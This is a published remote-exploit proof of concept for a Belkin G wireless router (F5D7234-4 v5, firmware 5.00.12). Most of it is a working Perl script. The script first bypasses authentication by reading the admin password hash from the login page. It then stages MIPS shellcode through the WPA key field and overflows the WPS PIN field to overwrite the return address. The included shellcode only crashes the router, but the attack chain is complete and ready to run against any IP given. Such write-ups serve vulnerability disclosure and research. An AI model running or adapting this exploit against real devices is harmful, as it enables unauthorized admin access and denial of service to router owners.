219 lines
No EOL
5 KiB
Text
219 lines
No EOL
5 KiB
Text
+-----------------------------------+
|
|
| Belkin G Wireless Router RCE PoC. |
|
|
+-----------------------------------+
|
|
|
|
|
|
|
|
Firmware Version : 5.00.12 (Sep 10 2009 19:54:12)
|
|
Boot Version : 1.18
|
|
Hardware : F5D7234-4 v5 (01)
|
|
Author : Aodrulez.
|
|
Email : atul.alex@orchidseven.com
|
|
Twitter : http://twitter.com/Aodrulez
|
|
|
|
|
|
+---------+
|
|
| Details |
|
|
+---------+
|
|
|
|
The exploit works in 3 stages.
|
|
1. Authentication.
|
|
2. Setting up shellcode in the memory at a known location.
|
|
3. Triggering an RA register over-write to execute the shellcode.
|
|
|
|
This particular model of router is based on 'embedded Configurable operating system' a.k.a (eCos) version 2.0. The shellcode used in the exploit is a dummy one that basically just triggers an exception & crashes the router, forcing it to reboot.
|
|
|
|
|
|
Video Demo :
|
|
http://www.youtube.com/watch?v=MtrYs-f6X3E
|
|
|
|
|
|
+---------+
|
|
| Exploit |
|
|
+---------+
|
|
|
|
#!/usr/bin/perl
|
|
|
|
use strict;
|
|
use warnings;
|
|
use LWP 5.64;
|
|
$| = 1;
|
|
|
|
# Variable declarations.
|
|
my $browser = LWP::UserAgent->new;
|
|
my $passHash="";
|
|
my $url ="";
|
|
my $response ="";
|
|
my $ip="";
|
|
$browser ->timeout(10);
|
|
|
|
|
|
# Just a few nops followed by a dummy shellcode that crashes & reboots the router.
|
|
my $shellcode="\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x04\xd0\xff\xff\x20\x20\x20\x20";
|
|
|
|
|
|
|
|
sub Authenticate()
|
|
{
|
|
print "[+] Trying to authenticate.\n";
|
|
$url= "http://$ip/login.stm";
|
|
$response = $browser->get( $url);
|
|
my @aod= $response->content =~ m/var password = "(.*)";/g;
|
|
if(!$aod[0])
|
|
{
|
|
print "[-] Damn! Something went wrong. This might not work here :-/\n";
|
|
exit;
|
|
}
|
|
else
|
|
{
|
|
$passHash=$aod[0];
|
|
print "[+] Admin Password = $passHash (MD5 Hash).\n";
|
|
}
|
|
|
|
print "[+] Time to authenticate you!\n";
|
|
$url = "http://$ip/cgi-bin/login.exe";
|
|
$response = $browser->post( $url,
|
|
[ 'totalMSec' => "1377121454.99",
|
|
'pws' => "$passHash",
|
|
,]
|
|
);
|
|
|
|
if( $response->content =~ /index/ )
|
|
{
|
|
print "[+] Logged in successfully as 'Admin'!\n";
|
|
print "[!] Open this link in a browser for admin access : http://$ip/setup.htm \n";
|
|
} else {
|
|
print "[-] Login failed! This might not work here :-/\n";
|
|
exit;
|
|
}
|
|
|
|
print "\n[+] Continue with exploitation? (Y/N) : ";
|
|
my $temp=<STDIN>;
|
|
if ($temp=~"Y" || $temp=~"y")
|
|
{
|
|
Exploit();
|
|
}
|
|
else
|
|
{
|
|
print "[+] Have fun!\n\n";
|
|
exit;
|
|
}
|
|
}
|
|
|
|
|
|
sub Exploit()
|
|
{
|
|
# Stage 1: Fill shellcode at a known location : 0x803c0278 (Buffer=120 bytes)
|
|
# 0x803c0278 is fixed for this device/firmware combination.
|
|
print "[+] Stage 1 : Allocating shellcode.\n";
|
|
|
|
if (length($shellcode) > 120)
|
|
{
|
|
print "[-] Shellcode is too big! (120 bytes Max)\n";
|
|
exit;
|
|
}
|
|
print "[+] Shellcode length : ".length($shellcode)."\n";
|
|
|
|
# Fill the rest with nops. Not needed but good to have.
|
|
# Shellcode size should be ideally a multiple of 4 as this is MIPS.
|
|
my $nopsize=120-length($shellcode);
|
|
$shellcode=$shellcode.("\x20"x$nopsize);
|
|
|
|
$url = "http://$ip/cgi-bin/wireless_WPA.exe";
|
|
$response = $browser->post( $url,
|
|
[ 'wpa_authen' => "1",
|
|
'wpa_psk' => '0',
|
|
's_rekeysec' => '900000',
|
|
's_rekeypkt' => '1000',
|
|
'w802_rekey' => '0',
|
|
'encryption' => '3',
|
|
'security_type' => '4',
|
|
'authentication' => '3',
|
|
'encryption_hid' => '3',
|
|
'wpa_key_text' => "ssss",
|
|
'wpa_key_pass' => "$shellcode",
|
|
'obscure_psk' => '1',
|
|
'sharedkey_alter' => '',
|
|
'sharedkey_alter1' => '1',
|
|
|
|
,]
|
|
);
|
|
|
|
if( !$response->content )
|
|
{
|
|
print "[-] Damn! Something went wrong. This might not work here :-/\n";
|
|
}
|
|
else
|
|
{
|
|
print "[+] Stage 1 seems to have gone well.\n";
|
|
}
|
|
|
|
# Stage 2: Trigger Stack Overflow & overwrite RA
|
|
print "[+] Stage 2 : Triggering Return Address overwrite.\n";
|
|
|
|
my $junk="A"x32;
|
|
my $s0="BBBB";
|
|
my $s1="CCCC";
|
|
my $ra="\x78\x02\x3c\x80"; #EPC -> 0x803c0278 Fixed for this device/firmware combination.
|
|
my $nop="\x20\x20\x20\x20";
|
|
my $payload=$junk.$s0.$s1.$ra.$nop;
|
|
|
|
$url = "http://$ip/cgi-bin/wireless_WPS_Enroll.exe";
|
|
$response = $browser->post( $url,[ 'pin' => "$payload"]);
|
|
if( !$response->content )
|
|
{
|
|
print "[-] Damn! Something went wrong. This might not work here :-/\n";
|
|
}
|
|
else
|
|
{
|
|
print "[-] Done! \\m/\n";
|
|
}
|
|
|
|
}
|
|
|
|
sub Welcome()
|
|
{
|
|
print "\n\n+------------------------------------------+\n";
|
|
print "| Belkin G Wireless Router Remote Exploit |\n";
|
|
print "| (Authentication bypass & RCE PoC) |\n";
|
|
print "+------------------------------------------+\n";
|
|
print "[+] By Aodrulez.\n";
|
|
print "\n[+] Usage : perl $0 router_ip";
|
|
print "\n[!] Example : perl $0 192.168.2.1";
|
|
|
|
if (!$ARGV[0])
|
|
{
|
|
print "\n[-] (o_0) Seriously??\n";
|
|
exit;
|
|
}
|
|
|
|
$ip=$ARGV[0];
|
|
print "\n[+] Target IP : $ip\n";
|
|
|
|
}
|
|
|
|
# Burn!!
|
|
Welcome();
|
|
Authenticate();
|
|
# End of exploit code.
|
|
|
|
|
|
|
|
+-------------------+
|
|
| Greetz Fly Out To |
|
|
+-------------------+
|
|
|
|
|
|
1] Amforked() : My Mentor.
|
|
2] The Blue Genius : My Boss.
|
|
3] str0ke (milw0rm)
|
|
4] www.orchidseven.com
|
|
5] www.malcon.org
|
|
6] www.nsd.org.in
|
|
|
|
|
|
+-------+
|
|
| Quote |
|
|
+-------+
|
|
|
|
“I would rather die of passion than of boredom.” - Vincent van Gogh. |